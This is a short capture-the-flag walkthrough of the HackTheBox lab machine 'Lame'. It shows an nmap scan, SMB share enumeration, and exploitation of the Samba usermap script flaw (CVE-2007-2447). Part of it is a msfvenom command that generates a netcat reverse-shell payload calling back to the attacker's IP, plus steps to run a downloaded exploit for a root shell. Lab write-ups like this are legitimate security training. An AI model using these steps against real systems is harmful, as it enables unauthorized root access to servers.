Lame - Manual Exploit
Difficulty = Easy
Running our nmap scan we have
# Nmap 7.94 scan initiated Sat Jul 29 07:48:57 2023 as: nmap -p21,22,139,445 -sCV -T4 -oN nmap.txt -Pn 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.41s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2023-07-29T07:49:32-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m11s, deviation: 2h49m47s, median: 7s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 29 07:50:03 2023 -- 1 IP address (1 host up) scanned in 65.54 seconds
We have anonymous access to FTP
but can’t put files inside it, also there are no files inside it
Using smbmap
to enumerate shares we have READ, WRITE
permissions on only one share (tmp)
Connecting to the share with smbclient
we have
We can go ahead and download all of this files
Only 2 where permitted for us to download
Nothing still seems interesting in this files
Checking the smb version, i found out it is vulnerable to Username’ map script’ Command Execution (CVE-2007-2447), we can go ahead and download the exploit from here
- Make sure
pysmb
is installed
sudo pip2 install pysmb
- Then run this command replacing
LHOST
with yourtun0
IP address and copy the shellcode
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.90 LPORT=1337 -f python
- Replace it with the default shellcode in the script
Run the script with python2
and get a reverse shell
Hell yeah, we got reverse shell as user root